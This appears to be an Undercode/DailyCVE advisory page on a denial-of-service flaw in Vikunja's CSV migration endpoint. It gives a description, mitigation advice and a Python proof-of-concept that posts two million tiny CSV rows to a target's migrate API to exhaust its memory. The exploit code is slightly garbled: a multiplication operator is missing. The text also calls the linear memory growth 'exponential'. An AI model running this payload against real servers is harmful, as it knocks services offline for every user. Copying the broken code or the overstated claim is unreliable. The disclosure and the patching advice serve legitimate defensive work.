Vikunja, Unbounded CSV Row Cardinality Resource Exhaustion, CVE-2026-91969 (High) -DC-Oct2026-3056

Listen to this Post

The vulnerability identified as CVE-2026-91969 affects the v2 CSV migration route within the application backend. Specifically, the endpoint `POST /api/v2/migration/csv/migrate` enforces limits on raw upload byte sizes but completely fails to constrain the parsed row cardinality or object instantiation scale. When an authenticated user submits a specially crafted multipart CSV file containing millions of tiny rows with an ignore mapping configuration, the internal CSV reader uses `csv.Reader.ReadAll` to retain every single record simultaneously in memory. Following this parsing stage, the `convertToVikunja` function proceeds to materialize a full task structure for every individual row prior to database insertion. Because memory allocation scales directly with the number of rows rather than the compressed file size, a small multi-megabyte payload expands exponentially during processing. This Cardinality amplification quickly exhausts the process heap space, triggering an out-of-memory error (OOM) and causing the container runtime or application service to crash with exit code 137. Consequently, a low-privileged remote user can easily trigger a denial-of-service condition, terminating the API service for all concurrent users without requiring administrative privileges or bypassing strict file size restrictions.

DailyCVE Form:

Platform: Vikunja
Version: < 2.6.0
Vulnerability : Resource Exhaustion
Severity: High
date: August 28, 2026

Prediction: September 15, 2026

What Undercode Say

Bash Commands and Codes

docker build -t PoC-container reproduction/
docker run --detach --name target-container --network net-local target-app
python3 reproduction/client.py
// Relevant code snippet showing unconstrained CSV iteration
r := csv.NewReader(file)
records, err := r.ReadAll()
for _, record := range records {
convertToVikunja(record)
}

Exploit: (Educational Purposes!)

import urllib.request, uuid, json
boundary = "-PoC-" + uuid.uuid4().hex
csv_data = b"x\n" 2_000_000
config = json.dumps({"delimiter": ",", "mapping": [{"column_index": 0, "attribute": "ignore"}]})
body = (
f"--{boundary}\r\nContent-Disposition: form-data; name=\"config\"\r\n\r\n{config}\r\n".encode()
+ f"--{boundary}\r\nContent-Disposition: form-data; name=\"import\"; filename=\"fixture.csv\"\r\nContent-Type: text/csv\r\n\r\n".encode()
+ csv_data
+ f"\r\n--{boundary}--\r\n".encode()
)
req = urllib.request.Request("http://target:3456/api/v2/migration/csv/migrate", data=body, headers={"Authorization": "Bearer token", "Content-Type": "multipart/form-data; boundary=" + boundary}, method="POST")
urllib.request.urlopen(req)

Protection: from this CVE

Enforce hard limits on total row cardinality and maximum items processed during data imports, implement streaming parsers instead of loading all records into arrays via ReadAll, and apply strict memory budgets per job.

Impact

A low-privileged remote attacker can systematically exhaust memory resources on the server backend, resulting in complete service downtime, process termination, and operational denial of service for all application users.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top